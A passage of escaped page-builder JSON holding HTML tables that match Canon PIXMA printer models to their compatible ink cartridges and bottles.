width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 